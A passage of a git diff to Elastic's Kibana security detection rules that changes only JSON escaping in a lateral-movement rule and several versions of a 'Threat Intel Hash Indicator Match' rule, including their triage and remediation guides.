\"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n 
\"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n",
 "references": [
 "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f"
 ],
@@ -113,7 +113,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json
index 45c41528615..6ea5b837102 100644
--- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json
@@ -237,7 +237,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json
index ec09bb6ccb3..2b318037bf5 100644
--- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network 
administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network 
administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "file.hash.*:* or file.pe.imphash:* or process.hash.*:* or process.pe.imphash:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -225,7 +225,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json index 77a31adec3f..7292795d24f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network 
administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network 
administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -197,7 +197,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json index 20b9a7062bc..e534a08596f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. 
When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. 
This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data 
collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -197,7 +197,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json index d03b8859562..c1f30281682 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json 
